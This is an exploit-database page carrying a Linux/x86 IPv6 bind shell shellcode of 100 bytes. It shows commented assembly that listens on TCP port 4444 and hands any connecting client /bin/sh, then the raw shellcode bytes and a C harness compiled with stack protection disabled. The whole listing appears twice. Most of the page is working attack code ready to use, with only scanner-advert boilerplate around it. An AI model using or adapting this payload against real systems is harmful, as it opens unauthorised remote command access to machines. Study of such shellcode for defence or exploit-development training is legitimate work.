Registerlinuxx86 bind (4444tcp) shell (binsh) + ipv6 shellcode (100 bytes)
▸▸▸ Exploit & Vulnerability >> shellcode exploit & linux_x86 vulnerability
Online Vulnerability Scanner Tools
Code...
/* # Title: Linux/x86 - Bind (4444/TCP) Shell + IPv6 Shellcode (100 bytes) # Length : 100bytes # Author: Kartik Durg # Write-up Link: https://iamroot.blog/2018/07/17/0x1-shell_bind_tcp_ipv6-linux-x86/ # Tested on: Ubuntu 16.0.4.1 (i686) */ /* global _start section .text _start: ;References: ;(1)http://syscalls.kernelgrok.com/ ;(2)https://www.3dbrew.org/wiki/Socket_Services ;(3)http://osr600doc.xinuos.com/en/SDK_netapi/sockC.TheIPv6sockaddrstructure.html ;(4)http://www.qnx.com/developers/docs/6.5.0/index.jsp?topic=%2Fcom.qnx.doc.neutrino_lib_ref%2Fi%2Finet6_proto.html ;IPV6 socket creation ;int socketcall(int call, unsigned long *args); ;sockfd = socket(int socket_family, int socket_type, int protocol); push byte 0x66 ; socketcall() pop eax ;EAX=0x2 xor ebx,ebx ; zero out ebx push 0x6 ; IPPROTO_TCP=6 push 0x1 ; socket_type=SOCK_STREAM (0x1) push 0xa ; AF_INET6 inc ebx ; Define SYS_socket = 1 mov ecx,esp ; save pointer (ESP) to socket() args (ECX) int 0x80 xchg esi,eax ; host_sockfd stored in esi xor eax,eax ;int socketcall(int call, unsigned long *args); ;bind(host_sockfd, (struct sockaddr*) &host_addr, sizeof(host_addr)); push DWORD eax ;x4 dword ipv6 loopback | EAX contains 0 push DWORD eax push DWORD eax push DWORD eax push eax ;sin6_addr = in6addr_any | in6addr_any=::0 push WORD 0x5c11 ;sin6_port=4444 | 0x5c11 | Configurable | push WORD 0x0a ;AF_INET6 mov ecx,esp ;ECX holds pointer to struct sockaddr push byte 0x1c ;sizeof(sockaddr_in6) | sockaddr_in6 = 28 push ecx ;pointer to host_sockfd push esi ;host_sockfd mov ecx,esp ;ECX points to args inc ebx ;EBX = 0x2 | #define SYS_BIND 2 push byte 0x66 ;socketcall() pop eax int 80h ;Listen ;int socketcall(int call, unsigned long *args); ;int listen(int host_sockfd, int backlog); push ebx ;EBX=2 | backlog=2 push esi ;poiter to host_sockfd mov ecx,esp ;ECX points to args inc ebx inc ebx ;EBX=0x4 | #define SYS_LISTEN 4 push byte 0x66 pop eax ;socketcall() int 80h ;Accept ;int socketcall(int call, unsigned long *args); ;accept(int sockfd, NULL, NULL); cdq ;EDX = 0x0 | Saves a byte push edx ;Push NULL push edx ;Push NULL push esi ;Push host_sockfd mov ecx,esp ;ECX points to args inc ebx ;EBX = 0x5 | #define SYS_ACCEPT 5 push byte 0x66 ;socketcall() pop eax int 80h xchg ebx,eax ;save client_sockfd push byte 0x2 ;push 0x2 on stack pop ecx ;ECX = 2 ;dup2() to redirect stdin(0), stdout(1) and stderr(2) loop: push byte 0x3f ;dup2() pop eax ;ECX = 0x3f int 0x80 ;exec sys_dup2 dec ecx ;decrement counter jns loop ;SF not set? then keep on jumping ;execve(/bin//sh) xor ecx,ecx ;clear ECX push ecx ;Push NULL push byte 0x0b ;execve() sys call number pop eax ;EAX=0x2 | execve() push 0x68732f2f ;(1)/bin//sh push 0x6e69622f ;(2)/bin//sh mov ebx,esp ;EBX pointing to "/bin//sh" int 0x80 ;Calling Interrupt for sys call */ /* gcc shellcode.c -o shellcode -fno-stack-protector -z execstack -m32 ./shellcode */ #include<stdio.h> unsigned char shellcode[] = \ "\x6a\x66\x58\x31\xdb\x6a\x06\x6a\x01\x6a\x0a\x43\x89\xe1\xcd\x80\x96\x31\xc0\x50\x50\x50\x50\x50\x66\x68\x11\x5c\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\x53\x56\x89\xe1\x43\x43\x6a\x66\x58\xcd\x80\x99\x52\x52\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\x93\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; main() { printf("Shellcode Length: %d\n", sizeof(shellcode) - 1); int (*ret)() = (int(*)())shellcode; ret(); } /* # Title: Linux/x86 - Bind (4444/TCP) Shell + IPv6 Shellcode (100 bytes) # Length : 100bytes # Author: Kartik Durg # Write-up Link: https://iamroot.blog/2018/07/17/0x1-shell_bind_tcp_ipv6-linux-x86/ # Tested on: Ubuntu 16.0.4.1 (i686) */ /* global _start section .text _start: ;References: ;(1)http://syscalls.kernelgrok.com/ ;(2)https://www.3dbrew.org/wiki/Socket_Services ;(3)http://osr600doc.xinuos.com/en/SDK_netapi/sockC.TheIPv6sockaddrstructure.html ;(4)http://www.qnx.com/developers/docs/6.5.0/index.jsp?topic=%2Fcom.qnx.doc.neutrino_lib_ref%2Fi%2Finet6_proto.html ;IPV6 socket creation ;int socketcall(int call, unsigned long *args); ;sockfd = socket(int socket_family, int socket_type, int protocol); push byte 0x66 ; socketcall() pop eax ;EAX=0x2 xor ebx,ebx ; zero out ebx push 0x6 ; IPPROTO_TCP=6 push 0x1 ; socket_type=SOCK_STREAM (0x1) push 0xa ; AF_INET6 inc ebx ; Define SYS_socket = 1 mov ecx,esp ; save pointer (ESP) to socket() args (ECX) int 0x80 xchg esi,eax ; host_sockfd stored in esi xor eax,eax ;int socketcall(int call, unsigned long *args); ;bind(host_sockfd, (struct sockaddr*) &host_addr, sizeof(host_addr)); push DWORD eax ;x4 dword ipv6 loopback | EAX contains 0 push DWORD eax push DWORD eax push DWORD eax push eax ;sin6_addr = in6addr_any | in6addr_any=::0 push WORD 0x5c11 ;sin6_port=4444 | 0x5c11 | Configurable | push WORD 0x0a ;AF_INET6 mov ecx,esp ;ECX holds pointer to struct sockaddr push byte 0x1c ;sizeof(sockaddr_in6) | sockaddr_in6 = 28 push ecx ;pointer to host_sockfd push esi ;host_sockfd mov ecx,esp ;ECX points to args inc ebx ;EBX = 0x2 | #define SYS_BIND 2 push byte 0x66 ;socketcall() pop eax int 80h ;Listen ;int socketcall(int call, unsigned long *args); ;int listen(int host_sockfd, int backlog); push ebx ;EBX=2 | backlog=2 push esi ;poiter to host_sockfd mov ecx,esp ;ECX points to args inc ebx inc ebx ;EBX=0x4 | #define SYS_LISTEN 4 push byte 0x66 pop eax ;socketcall() int 80h ;Accept ;int socketcall(int call, unsigned long *args); ;accept(int sockfd, NULL, NULL); cdq ;EDX = 0x0 | Saves a byte push edx ;Push NULL push edx ;Push NULL push esi ;Push host_sockfd mov ecx,esp ;ECX points to args inc ebx ;EBX = 0x5 | #define SYS_ACCEPT 5 push byte 0x66 ;socketcall() pop eax int 80h xchg ebx,eax ;save client_sockfd push byte 0x2 ;push 0x2 on stack pop ecx ;ECX = 2 ;dup2() to redirect stdin(0), stdout(1) and stderr(2) loop: push byte 0x3f ;dup2() pop eax ;ECX = 0x3f int 0x80 ;exec sys_dup2 dec ecx ;decrement counter jns loop ;SF not set? then keep on jumping ;execve(/bin//sh) xor ecx,ecx ;clear ECX push ecx ;Push NULL push byte 0x0b ;execve() sys call number pop eax ;EAX=0x2 | execve() push 0x68732f2f ;(1)/bin//sh push 0x6e69622f ;(2)/bin//sh mov ebx,esp ;EBX pointing to "/bin//sh" int 0x80 ;Calling Interrupt for sys call */ /* gcc shellcode.c -o shellcode -fno-stack-protector -z execstack -m32 ./shellcode */ #include<stdio.h> unsigned char shellcode[] = \ "\x6a\x66\x58\x31\xdb\x6a\x06\x6a\x01\x6a\x0a\x43\x89\xe1\xcd\x80\x96\x31\xc0\x50\x50\x50\x50\x50\x66\x68\x11\x5c\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\x53\x56\x89\xe1\x43\x43\x6a\x66\x58\xcd\x80\x99\x52\x52\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\x93\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x31\xc9\x51\x6a\x0b\x58\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; main() { printf("Shellcode Length: %d\n", sizeof(shellcode) - 1); int (*ret)() = (int(*)())shellcode; ret(); }
Linuxx86 bind (4444tcp) shell (binsh) + ipv6 shellcode (100 bytes) Vulnerability / Exploit Source : Linuxx86 bind (4444tcp) shell (binsh) + ipv6 shellcode (100 bytes)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes